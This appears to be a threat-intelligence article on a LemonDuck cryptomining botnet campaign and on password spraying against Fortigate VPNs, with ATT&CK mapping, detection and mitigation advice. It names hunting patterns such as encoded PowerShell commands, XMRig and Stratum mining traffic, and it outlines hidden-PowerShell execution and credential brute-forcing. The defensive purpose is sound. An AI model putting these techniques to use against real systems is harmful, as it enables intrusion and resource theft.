Barracuda Researchers Detail LemonDuck Malware Campaign Hijacking Endpoints for Cryptomining

LemonDuck Cryptomining Malware Spreads via PowerShell in New Campaign

MEDIUM
June 26, 2026
4m read
MalwareCyberattack

Related Entities

Organizations

Barracuda

Products & Tech

PowerShell Fortigate

Other

LemonDuck Iran

MITRE ATT&CK Techniques

T1496Impact

Resource Hijacking

T1059.001Execution

PowerShell

T1110.003Credential Access

Password Spraying

T1190Initial Access

Exploit Public-Facing Application

T1021.001Lateral Movement

Remote Desktop Protocol

Full Report

Executive Summary

Barracuda researchers have observed a recent campaign deploying the LemonDuck malware, a botnet that specializes in resource hijacking for cryptocurrency mining. The malware spreads laterally across networks by exploiting vulnerabilities and brute-forcing credentials, then uses infected endpoints' CPU and GPU resources to mine cryptocurrency for the attackers. The observed campaign utilized hidden PowerShell scripts to download additional payloads and maintain communication with its command-and-control (C2) infrastructure. Separately, the report highlights a significant 55% surge in password-spraying attacks originating from Iran, specifically targeting Fortigate VPNs, indicating a broader trend of attacks against remote access infrastructure.

Threat Overview

  • Malware: LemonDuck, a cryptomining botnet.
  • Primary Objective: Resource Hijacking (T1496 - Resource Hijacking). The malware uses the computational power of infected systems to mine cryptocurrency, generating profit for the operators.
  • Propagation: Spreads across networks by exploiting exposed services, using weak credentials, and leveraging known vulnerabilities.
  • Execution: Employs PowerShell scripts to download and execute malicious code, often in a hidden or fileless manner to evade detection.

While cryptomining is the primary goal, a botnet like LemonDuck also provides a persistent foothold in a network, which can be sold or repurposed for other malicious activities, such as deploying ransomware or launching DDoS attacks.

Technical Analysis

The LemonDuck campaign observed by Barracuda's SOC demonstrated several key TTPs:

  1. Initial Access: LemonDuck is known to gain initial access through various methods, including exploiting vulnerabilities like those in Microsoft Exchange (ProxyLogon) or brute-forcing credentials for services like SMB and RDP.
  2. Execution and Persistence: Upon gaining access, the malware executes PowerShell scripts. These scripts are often obfuscated and run with parameters like -WindowStyle Hidden to conceal their activity from the user. The scripts are responsible for downloading the main mining payload and other malicious modules.
  3. Command and Control: The infected endpoint establishes communication with a C2 server. This allows the operators to update the malware, change the cryptocurrency being mined, or assign new tasks to the botnet.
  4. Lateral Movement: LemonDuck has worm-like capabilities, actively scanning the local network for other vulnerable systems to infect, thereby growing the botnet.

The separate finding of increased password-spraying attacks from Iran against Fortigate VPNs highlights a parallel threat. Attackers are systematically attempting to breach corporate networks by guessing common passwords for a large number of user accounts (T1110.003 - Password Spraying). A successful VPN compromise provides a direct entry point for deploying malware like LemonDuck.

Impact Assessment

While often considered less severe than ransomware, a LemonDuck infection can have significant business impacts:

  • Performance Degradation: The constant cryptomining activity consumes significant CPU and GPU resources, leading to severe performance degradation of workstations and servers. This can disrupt business applications and reduce employee productivity.
  • Increased Costs: For cloud-based infrastructure, the increased CPU usage can lead to substantially higher electricity and computing bills.
  • Security Risk: The botnet provides a backdoor into the network. The operators could use this access to deploy more destructive malware, such as ransomware, at any time.
  • Network Saturation: The malware's lateral movement scanning can create excessive network traffic, potentially impacting network performance.

IOCs — Directly from Articles

No specific technical indicators of compromise were provided in the summarized articles.

Cyber Observables — Hunting Hints

To hunt for LemonDuck and similar cryptomining threats, security teams should look for:

Type
process_name
Value
powershell.exe, xmrig.exe
Description
Monitor for PowerShell execution with encoded commands or the presence of common mining software like XMRig.
Type
cpu_utilization
Value
Sustained high CPU usage
Description
A workstation or server running at or near 100% CPU for extended periods with no legitimate reason is a strong indicator of cryptomining.
Type
network_traffic_pattern
Value
stratum+tcp or stratum+ssl
Description
Look for outbound connections to known cryptocurrency mining pools using the Stratum protocol.
Type
log_source
Value
VPN Logs
Description
For password spraying, look for a high volume of failed logins from a single IP across many different user accounts.

Detection & Response

  1. Performance Monitoring: Implement performance monitoring for all endpoints and servers. Configure alerts for any system exhibiting sustained high CPU usage (e.g., >90% for more than 30 minutes). This is a key part of D3FEND's Process Analysis (D3-PA).
  2. PowerShell Logging: Enable enhanced PowerShell logging (Script Block Logging and Module Logging) to capture the full content of executed scripts, even if they are obfuscated or fileless.
  3. Network Egress Filtering: Block outbound traffic to known cryptocurrency mining pool domains and ports at the firewall. This is an application of Outbound Traffic Filtering (D3-OTF).

Mitigation

  1. Patch Management: Aggressively patch vulnerabilities in internet-facing systems and common applications to prevent initial access. This aligns with M1051 - Update Software.
  2. Strong Password Policies and MFA: Enforce strong, unique passwords for all accounts and mandate MFA for all remote access (VPNs) and administrative interfaces. This directly counters password spraying and brute-force attacks and is a key control under M1027 - Password Policies and M1032 - Multi-factor Authentication.
  3. Endpoint Hardening: Restrict the use of PowerShell for standard users where it is not required for their job function. This is a form of M1028 - Operating System Configuration.

Timeline of Events

1
June 26, 2026
This article was published

MITRE ATT&CK Mitigations

Update Software

M1051enterprise

Keep all systems, especially internet-facing ones, patched to prevent exploitation.

Mapped D3FEND Techniques:

D3-SU

Multi-factor Authentication

M1032enterprise

Enforce MFA on all VPNs and remote access solutions to defeat password-spraying attacks.

Mapped D3FEND Techniques:

D3-MFA

Password Policies

M1027enterprise

Enforce strong password policies and use account lockout mechanisms to hinder brute-force and password-spraying attempts.

Mapped D3FEND Techniques:

D3-SPP

Filter Network Traffic

M1037enterprise

Block outbound connections to known cryptomining pools at the network perimeter.

D3FEND Defensive Countermeasures

Process Analysis

D3-PAMaps to MITREM1049
D3FEND

To detect LemonDuck and other cryptominers, process and performance monitoring is key. Deploy an EDR or use native OS tools to monitor CPU utilization across all endpoints. Configure alerts for any process that causes sustained CPU usage above a certain threshold (e.g., 80%) for an extended period (e.g., 15 minutes), especially if that process is unsigned or running from an unusual directory. For LemonDuck specifically, hunt for powershell.exe processes with encoded commands (-enc) that have high CPU usage as a child process. This behavioral approach can detect the mining activity regardless of the specific miner executable being used.

Authentication Event Thresholding

D3-ANETMaps to MITREM1036
D3FEND

To counter the password-spraying attacks targeting Fortigate VPNs, organizations must implement authentication event thresholding. Ingest VPN authentication logs into a SIEM and create a rule that triggers an alert when a single source IP address generates a high number of failed logins across multiple different user accounts within a short time frame (e.g., more than 20 failed logins for 10+ distinct users from one IP in 5 minutes). This is the classic signature of a password spray. The automated response should be to temporarily block the source IP at the firewall, preventing the attacker from continuing their attempt and potentially guessing a valid password.

Outbound Traffic Filtering

D3-OTFMaps to MITREM1021
D3FEND

A direct way to neutralize cryptomining malware is to block its ability to communicate with the mining pool. Maintain a threat intelligence feed of known cryptocurrency mining pool domains and IP addresses. Configure your perimeter firewall or web proxy to block all outbound connections to these destinations. Specifically, block traffic using the stratum+tcp protocol. This ensures that even if a machine becomes infected with LemonDuck, the miner will be unable to receive work or submit shares, rendering the infection unprofitable for the attacker and stopping the resource hijacking.

Sources & References

Barracuda Unveils SOC Threat Radar — June 2026
ITVoice.inJune 26, 2026
Weekly Intelligence Report - 26 Jun 2026
CYFIRMA (cyfirma.com) June 26, 2026

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)
LinkedIn

Tags

LemonDuckCryptominingBotnetPowerShellBarracudaPassword SprayingFortigate

📢 Share This Article

Help others stay informed about cybersecurity threats

🎯 MITRE ATT&CK Mapped

Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.

🧠 Enriched & Analyzed

Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.

🛡️ Actionable Guidance

Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.

🔗 STIX Visualizer

Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.

Sigma Generator

Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.